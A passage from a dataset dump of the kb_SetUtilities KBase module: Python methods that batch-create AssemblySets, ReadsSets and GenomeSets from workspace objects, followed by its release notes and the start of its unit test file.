FAILURE: Unable to save read library set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n # build report\n #\n self.log (console, \"SAVING REPORT\")\n report += \"TOTAL READS LIBRARIES COMBINED INTO ONE READS SET: \"+ str(len(combined_readsSet_ref_list))+\"\\n\"\n for set_i,this_readsLib_ref in enumerate(params['input_refs']):\n report += \"READS LIBRARIES ACCEPTED FROM ReadsSet \"+str(set_i)+\": \"+str(len(accepted_libs[set_i]))+\"\\n\"\n report += \"READS LIBRARIES REPEAT FROM ReadsSet \"+str(set_i)+\": \"+str(len(repeat_libs[set_i]))+\"\\n\"\n report += \"\\n\"\n reportObj = {'objects_created':[],\n 'text_message': report}\n\n reportObj['objects_created'].append({'ref':output_readsSet_ref,\n 'description':params['desc']})\n\n\n # save report object\n #\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Merge_MultipleReadsSets_to_OneReadsSet DONE\")\n #END KButil_Merge_MultipleReadsSets_to_OneReadsSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Merge_MultipleReadsSets_to_OneReadsSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Build_AssemblySet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Build_AssemblySet_Params\"\n (KButil_Build_AssemblySet() ** ** Method for creating an\n AssemblySet) -> structure: parameter \"workspace_name\" 
of type\n \"workspace_name\" (** The workspace object refs are of form: ** ** \n objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Build_AssemblySet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Build_AssemblySet\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Build_AssemblySet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Built AssemblySet'\n\n \n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 1:\n self.log(console,\"Must provide at least one Assembly\")\n self.log(invalid_msgs,\"Must provide at least one Assembly\")\n\n\n # Build AssemblySet\n #\n items = []\n ass_seen = dict()\n set_type = None\n\n for assRef in params['input_refs']:\n\n if not ass_seen.get(assRef):\n ass_seen[assRef] = True\n\n (assObj,\n info,\n ass_name,\n ass_type) = self.get_obj_data(assRef, 'assembly')\n\n if set_type != None:\n if ass_type != set_type:\n raise ValueError (\"Don't currently support heterogeneous AssemblySets. 
You have more than one type in your input\")\n set_type = ass_type\n\n # add assembly\n self.log(console,\"adding assembly \"+ass_name+\" : \"+assRef)\n items.append ({'ref': assRef,\n 'label': ass_name\n #'data_attachment': ,\n #'info'\n })\n\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING ASSEMBLY_SET\")\n output_assemblySet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_assemblySet_name = params['output_name']\n try:\n output_assemblySet_ref = self.setAPI_Client.save_assembly_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_assemblySet_name,\n 'data': output_assemblySet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n # build output report object\n #\n self.log(console,\"SAVING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console,\"assembly objs in output set \"+params['output_name']+\": \"+str(len(params['input_refs'])))\n report += 'assembly objs in output set '+params['output_name']+': '+str(len(params['input_refs']))\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':'KButil_Build_AssemblySet'}],\n 'text_message':report\n }\n else:\n report += \"FAILURE:\\n\\n\"+\"\\n\".join(invalid_msgs)+\"\\n\"\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Build_AssemblySet DONE\")\n #END KButil_Build_AssemblySet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_AssemblySet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Batch_Create_ReadsSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Batch_Create_ReadsSet_Params\"\n (KButil_Batch_Create_ReadsSet() ** ** Method for creating a\n ReadsSet without specifying individual objects) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. 
This is received from Narrative.),\n parameter \"name_pattern\" of String, parameter \"output_name\" of\n type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Batch_Create_ReadsSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Batch_Create_ReadsSet\n\n #### STEP 0: standard method init\n ##\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Batch_Create_ReadsSet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n\n \n # check params\n required_params = ['workspace_name',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Batch Created ReadsSet'\n\n\n #### STEP 3: refine name_pattern\n ##\n name_pattern = params.get('name_pattern')\n if name_pattern:\n name_pattern = name_pattern.strip()\n name_pattern = name_pattern.strip('*')\n name_pattern = name_pattern.replace('.','\\.')\n name_pattern = name_pattern.replace('*','.*')\n\n regexp_name_pattern = re.compile ('^.*'+name_pattern+'.*$')\n\n\n #### STEP 4: read ws for readslib objects\n ##\n pe_reads_obj_ref_by_name = dict()\n se_reads_obj_ref_by_name = dict()\n reads_obj_ref_by_name = None\n\n # Paired End\n pe_reads_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseFile.PairedEndLibrary',\n 'Paired-End Reads Library')\n for info in pe_reads_obj_info_list:\n reads_ref = self.get_obj_ref_from_obj_info(info)\n (reads_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' READS_NAME: '\"+reads_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(reads_name):\n self.log(console, \"ADDING \"+reads_name+\" (\"+reads_ref+\")\")\n pe_reads_obj_ref_by_name[reads_name] = reads_ref\n\n # Single End\n se_reads_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseFile.SingleEndLibrary',\n 'Single-End Reads Library')\n for info in se_reads_obj_info_list:\n reads_ref = self.get_obj_ref_from_obj_info(info)\n (reads_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' READS_NAME: '\"+reads_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(reads_name):\n self.log(console, \"ADDING \"+reads_name+\" (\"+reads_ref+\")\")\n se_reads_obj_ref_by_name[reads_name] = reads_ref\n\n # check for no hits\n if len(list(pe_reads_obj_ref_by_name.keys())) == 0 \\\n and len(list(se_reads_obj_ref_by_name.keys())) == 0:\n if not name_pattern:\n self.log(invalid_msgs, \"No Reads Library objects found\")\n else:\n self.log(invalid_msgs, \"No Reads Library objects passing name_pattern filter: '\"+name_pattern+\"'\")\n\n \n #### STEP 5: Build ReadsSet\n ##\n if len(invalid_msgs) == 0:\n items = []\n reads_ref_list = []\n\n # pick whether to use single end or paired end hits (favor paired end)\n if len(list(pe_reads_obj_ref_by_name.keys())) == 0 \\\n and len(list(se_reads_obj_ref_by_name.keys())) != 0:\n reads_obj_ref_by_name = se_reads_obj_ref_by_name\n else:\n reads_obj_ref_by_name = pe_reads_obj_ref_by_name\n\n # add readslibs\n 
for reads_name in sorted (reads_obj_ref_by_name.keys()):\n reads_ref = reads_obj_ref_by_name[reads_name]\n reads_ref_list.append (reads_ref)\n\n self.log(console,\"adding reads library \"+reads_name+\" : \"+reads_ref)\n items.append ({'ref': reads_ref,\n 'label': reads_name\n #'data_attachment': ,\n #'info'\n })\n\n\n #### STEP 6: Store output object\n ##\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING READS_SET\")\n\n # object def\n output_readsSet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_readsSet_name = params['output_name']\n # object save\n try:\n output_readsSet_ref = self.setAPI_Client.save_reads_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_readsSet_name,\n 'data': output_readsSet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save reads library set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n #### STEP 7: build output report object\n ##\n self.log(console,\"SAVING REPORT\")\n if len(invalid_msgs) != 0:\n report += \"\\n\".join(invalid_msgs)\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n else:\n self.log(console,\"reads library objs in output set \"+params['output_name']+\": \"+str(len(items)))\n report += 'reads library objs in output set '+params['output_name']+': '+str(len(items))\n desc = 'KButil_Batch_Create_ReadsSet'\n if name_pattern:\n desc += ' with name_pattern: '+name_pattern\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':desc}],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Batch_Create_ReadsSet DONE\")\n #END KButil_Batch_Create_ReadsSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Batch_Create_ReadsSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Batch_Create_AssemblySet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Batch_Create_AssemblySet_Params\"\n (KButil_Batch_Create_AssemblySet() ** ** Method for creating an\n AssemblySet without specifying individual objects) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. 
This is received from Narrative.),\n parameter \"name_pattern\" of String, parameter \"output_name\" of\n type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Batch_Create_AssemblySet_Output\"\n -> structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Batch_Create_AssemblySet\n\n #### STEP 0: standard method init\n ##\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Batch_Create_AssemblySet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n\n \n # check params\n required_params = ['workspace_name',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Batch Created AssemblySet'\n\n\n #### STEP 3: refine name_pattern\n ##\n name_pattern = params.get('name_pattern')\n if name_pattern:\n name_pattern = name_pattern.strip()\n name_pattern = name_pattern.strip('*')\n name_pattern = name_pattern.replace('.','\\.')\n name_pattern = name_pattern.replace('*','.*')\n\n regexp_name_pattern = re.compile ('^.*'+name_pattern+'.*$')\n\n\n #### STEP 4: read ws for assembly objects\n ##\n assembly_obj_ref_by_name = dict()\n assembly_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseGenomeAnnotations.Assembly',\n 'Assembly')\n for info in assembly_obj_info_list:\n assembly_ref = self.get_obj_ref_from_obj_info(info)\n (assembly_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' ASSEMBLY_NAME: '\"+assembly_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(assembly_name):\n self.log(console, \"ADDING \"+assembly_name+\" (\"+assembly_ref+\")\")\n assembly_obj_ref_by_name[assembly_name] = assembly_ref\n\n if len(list(assembly_obj_ref_by_name.keys())) == 0:\n if not name_pattern:\n self.log(invalid_msgs, \"No Assembly objects found\")\n else:\n self.log(invalid_msgs, \"No Assembly objects passing name_pattern filter: '\"+name_pattern+\"'\")\n\n\n #### STEP 5: Build AssemblySet\n ##\n if len(invalid_msgs) == 0:\n items = []\n assembly_ref_list = []\n for ass_name in sorted (assembly_obj_ref_by_name.keys()):\n # add assembly\n ass_ref = assembly_obj_ref_by_name[ass_name]\n assembly_ref_list.append (ass_ref)\n\n self.log(console,\"adding assembly \"+ass_name+\" : \"+ass_ref)\n items.append ({'ref': ass_ref,\n 'label': ass_name\n #'data_attachment': ,\n #'info'\n })\n\n\n #### STEP 6: Store output object\n ##\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING ASSEMBLY_SET\")\n\n # object def\n output_assemblySet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_assemblySet_name = params['output_name']\n # object save\n try:\n output_assemblySet_ref = self.setAPI_Client.save_assembly_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_assemblySet_name,\n 'data': output_assemblySet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n #### STEP 7: build output report object\n ##\n self.log(console,\"SAVING REPORT\")\n if 
len(invalid_msgs) != 0:\n report += \"\\n\".join(invalid_msgs)\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n else:\n self.log(console,\"assembly objs in output set \"+params['output_name']+\": \"+str(len(items)))\n report += 'assembly objs in output set '+params['output_name']+': '+str(len(items))\n desc = 'KButil_Batch_Create_AssemblySet'\n if name_pattern:\n desc += ' with name_pattern: '+name_pattern\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':desc}],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Batch_Create_AssemblySet DONE\")\n #END KButil_Batch_Create_AssemblySet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Batch_Create_AssemblySet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Batch_Create_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Batch_Create_GenomeSet_Params\"\n (KButil_Batch_Create_GenomeSet() ** ** Method for creating a\n GenomeSet without specifying individual objects) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. 
This is received from Narrative.),\n parameter \"name_pattern\" of String, parameter \"output_name\" of\n type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Batch_Create_GenomeSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Batch_Create_GenomeSet\n\n #### STEP 0: standard method init\n ##\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Batch_Create_GenomeSet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n \n\n # check params\n required_params = ['workspace_name',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Batch Created GenomeSet'\n\n\n #### STEP 3: refine name_pattern\n ##\n name_pattern = params.get('name_pattern')\n if name_pattern:\n name_pattern = name_pattern.strip()\n name_pattern = name_pattern.strip('*')\n name_pattern = name_pattern.replace('.','\\.')\n name_pattern = name_pattern.replace('*','.*')\n\n regexp_name_pattern = re.compile ('^.*'+name_pattern+'.*$')\n\n\n #### STEP 4: read ws for genome objects\n ##\n genome_obj_ref_by_name = dict()\n genome_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseGenomes.Genome',\n 'Genome')\n for info in genome_obj_info_list:\n genome_ref = self.get_obj_ref_from_obj_info(info)\n (genome_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' GENOME_NAME: '\"+genome_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(genome_name):\n self.log(console, \"ADDING \"+genome_name+\" (\"+genome_ref+\")\")\n genome_obj_ref_by_name[genome_name] = genome_ref\n\n if len(list(genome_obj_ref_by_name.keys())) == 0:\n if not name_pattern:\n self.log(invalid_msgs, \"No Genome objects found\")\n else:\n self.log(invalid_msgs, \"No Genome objects passing name_pattern filter: '\"+name_pattern+\"'\")\n\n \n #### STEP 5: Build GenomeSet\n ##\n if len(invalid_msgs) == 0:\n #items = []\n elements = dict()\n genome_ref_list = []\n for gen_name in sorted (genome_obj_ref_by_name.keys()):\n # add genome\n gen_ref = genome_obj_ref_by_name[gen_name]\n genome_ref_list.append (gen_ref)\n\n self.log(console,\"adding genome \"+gen_name+\" : \"+gen_ref)\n #items.append ({'ref': gen_ref,\n # 'label': gen_name\n # #'data_attachment': ,\n # #'info'\n # })\n elements[gen_name] = dict()\n elements[gen_name]['ref'] = gen_ref\n\n\n #### STEP 6: Store output object\n ##\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING GENOME_SET\")\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = genome_ref_list\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Batch_Create_GenomeSet')\n\n # object def\n output_genomeSet_obj = { 'description': params['desc'],\n #'items': items\n 'elements': elements\n }\n output_genomeSet_name = params['output_name']\n # object save\n try:\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{'type': 'KBaseSearch.GenomeSet',\n 'data': output_genomeSet_obj,\n 'name': output_genomeSet_name,\n 'meta': {},\n 
'provenance': provenance\n }]\n })[0]\n except Exception as e:\n raise ValueError('Workspace FAILURE: Unable to save genome set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n #### STEP 7: build output report object\n ##\n self.log(console,\"SAVING REPORT\")\n if len(invalid_msgs) != 0:\n report += \"\\n\".join(invalid_msgs)\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n else:\n self.log(console,\"genome objs in output set \"+params['output_name']+\": \"+str(len(list(elements.keys()))))\n report += 'genome objs in output set '+params['output_name']+': '+str(len(list(elements.keys())))\n desc = 'KButil_Batch_Create_GenomeSet'\n if name_pattern:\n desc += ' with name_pattern: '+name_pattern\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':desc}],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Batch_Create_GenomeSet DONE\")\n #END KButil_Batch_Create_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Batch_Create_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def status(self, ctx):\n #BEGIN_STATUS\n returnVal = {'state': \"OK\", 'message': \"\", 'version': self.VERSION,\n 'git_url': self.GIT_URL, 'git_commit_hash': self.GIT_COMMIT_HASH}\n #END_STATUS\n return [returnVal]\n"
},
{
"alpha_fraction": 0.7132779955863953,
"alphanum_fraction": 0.7365145087242126,
"avg_line_length": 25.77777862548828,
"blob_id": "24a1b2cdaa6365d21d898a824bd2d0f2069d83d8",
"content_id": "276cb8a76de2976da11d0f4112a64ab19787ee37",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2410,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 90,
"path": "/RELEASE_NOTES.md",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "### Version 1.7.6\n__Changes__\n- fixed bugs found in narrative beta testing\n- added error when trying to build ReadsSet mixing PE and SE\n- removed redundant output cells from Set creation Apps\n- made set_provenance() method\n- updated to use KBaseReport.create()\n- followed recommended code tidying\n\n### Version 1.7.5\n__Changes__\n- added Github Actions unit testing\n- tidied up links to support in App Docs\n\n### Version 1.7.4\n__Changes__\n- added support for FeatureSets that may include Annotated Metagenome Assembly features to\n * KButil_Merge_FeatureSet_Collection\n- fixed bug in KButil_Merge_FeatureSet_Collection to avoid duplication\n- fixed bug in KButil_Logical_Slice_*() that was returning union for yesA_notB and notA_yesB\n- updated path to support URL\n\n### Version 1.7.3\n__Changes__\n- fixed bug in \"Merge GenomeSets\" caused by SpeciesTree GenomeSet elements having same ids\n\n### Version 1.7.2\n__Changes__\n- added GenomeSets and SpeciesTrees as option to be added in \"Add Genomes to GenomeSet\"\n\n### Version 1.7.1\n__Changes__\n- tweaked Venn Slice to fix bug in GenomeSet and improve icon\n\n### Version 1.7.0\n__Changes__\n- added support for FeatureSets that may include Annotated Metagenome Assembly features to\n * KButil_Slice_FeatureSets_by_Genomes\n * KButil_Build_GenomeSet_from_FeatureSet\n * KButil_Logical_Slice_Two_FeatureSets (aka \"Venn Slice\")\n\n### Version 1.6.0\n__Changes__\n- added \"Venn Slice Two AssemblySets\" App\n- added \"Venn Slice Two GenomeSets\" App\n\n### Version 1.5.0\n__Changes__\n- added KButil_Remove_Genomes_from_GenomeSet()\n- changed KButil_Add_Genomes_to_GenomeSet() to accept genome object list\n- Description input field no longer required in Apps\n\n### Version 1.4.0\n__Changes__\n- added KButil_Batch_Create_ReadsSet()\n\n### Version 1.3.0\n__Changes__\n- update to python3\n\n### Version 1.2.0\n__Changes__\n- added KButil_Batch_Create_GenomeSet()\n- added KButil_Batch_Create_AssemblySet()\n\n### Version 1.1.3\n__Changes__\n- added unit test data\n\n### Version 1.1.2\n__Changes__\n- added KBase paper citation in PLOS format \n\n### Version 1.1.1\n__Changes__\n- updated base docker image to sdkbase2\n- improved docs pages for Apps\n\n### Version 1.1.0\n__Changes__\n- added \"Slice FeatureSets by Genomes\" App\n- added \"Logical Slice Two FeatureSets\" App\n- added transformation diagrams to docs pages\n\n### Version 1.0.1\n__Changes__\n- changed contact from email to url\n\n### Version 1.0.0\n- Initial release\n"
},
{
"alpha_fraction": 0.48845264315605164,
"alphanum_fraction": 0.5171477794647217,
"avg_line_length": 43.20246887207031,
"blob_id": "d92da89f634187e63dabd5bbe792149b39d1338c",
"content_id": "7f9ce7e32e67c6ef4fb88565b1d8d32c35c3908c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103920,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 2351,
"path": "/test/kb_SetUtilities_server_test.py",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "import os\nimport shutil\nimport time\nimport unittest\nfrom configparser import ConfigParser # py3\nfrom os import environ\nfrom pprint import pprint\n\nimport requests\n\nfrom installed_clients.AssemblyUtilClient import AssemblyUtil\nfrom installed_clients.GenomeFileUtilClient import GenomeFileUtil\nfrom installed_clients.ReadsUtilsClient import ReadsUtils\nfrom installed_clients.WorkspaceClient import Workspace as workspaceService\nfrom installed_clients.SetAPIServiceClient import SetAPI\nfrom kb_SetUtilities.kb_SetUtilitiesImpl import kb_SetUtilities\n\n\n[OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I,\n SIZE_I, META_I] = list(range(11)) # object_info tuple\n\nclass kb_SetUtilitiesTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n token = environ.get('KB_AUTH_TOKEN', None)\n cls.token = token\n cls.ctx = {'token': token, 'provenance': [{'service': 'kb_SetUtilities',\n 'method': 'please_never_use_it_in_production',\n 'method_params': []}],\n 'authenticated': 1}\n config_file = environ.get('KB_DEPLOYMENT_CONFIG', None)\n cls.cfg = {}\n config = ConfigParser()\n config.read(config_file)\n for nameval in config.items('kb_SetUtilities'):\n print(nameval[0] + '=' + nameval[1])\n cls.cfg[nameval[0]] = nameval[1]\n cls.wsURL = cls.cfg['workspace-url']\n cls.shockURL = cls.cfg['shock-url']\n cls.serviceWizardURL = cls.cfg['service-wizard-url']\n cls.callbackURL = os.environ['SDK_CALLBACK_URL']\n cls.wsClient = workspaceService(cls.wsURL, token=token)\n cls.serviceImpl = kb_SetUtilities(cls.cfg)\n cls.scratch = os.path.abspath(cls.cfg['scratch'])\n if not os.path.exists(cls.scratch):\n os.makedirs(cls.scratch)\n\n @classmethod\n def tearDownClass(cls):\n if hasattr(cls, 'wsName'):\n cls.wsClient.delete_workspace({'workspace': cls.wsName})\n print('Test workspace was deleted')\n if hasattr(cls, 'ws2Name'):\n cls.wsClient.delete_workspace({'workspace': cls.ws2Name})\n print('Test workspace2 was deleted')\n if hasattr(cls, 'shock_ids'):\n for shock_id in cls.shock_ids:\n print('Deleting SHOCK node: ' + str(shock_id))\n cls.delete_shock_node(shock_id)\n\n @classmethod\n def delete_shock_node(cls, node_id):\n header = {'Authorization': 'Oauth {0}'.format(cls.token)}\n requests.delete(cls.shockURL + '/node/' + node_id, headers=header,\n allow_redirects=True)\n print('Deleted shock node ' + node_id)\n\n def getWsClient(self):\n return self.__class__.wsClient\n\n def getWsName(self):\n if hasattr(self.__class__, 'wsName'):\n return self.__class__.wsName\n suffix = int(time.time() * 1000)\n wsName = \"test_kb_SetUtilities_\" + str(suffix)\n ret = self.getWsClient().create_workspace({'workspace': wsName})\n self.__class__.wsName = wsName\n return wsName\n\n def getWs2Name(self):\n if hasattr(self.__class__, 'ws2Name'):\n return self.__class__.ws2Name\n suffix = int(time.time() * 1000)\n ws2Name = \"test_kb_SetUtilities_\" + str(suffix)+'-2'\n ret = self.getWsClient().create_workspace({'workspace': ws2Name})\n self.__class__.ws2Name = ws2Name\n return ws2Name\n\n def getImpl(self):\n return self.__class__.serviceImpl\n\n def getContext(self):\n return self.__class__.ctx\n\n # call this method to get the WS object info of a Genome\n # (will upload the example data if this is the first time the method is called during tests)\n def getGenomeInfo(self, genome_basename, lib_i=0):\n if hasattr(self.__class__, 'genomeInfo_list'):\n try:\n info = self.__class__.genomeInfo_list[lib_i]\n name = self.__class__.genomeName_list[lib_i]\n if info != 
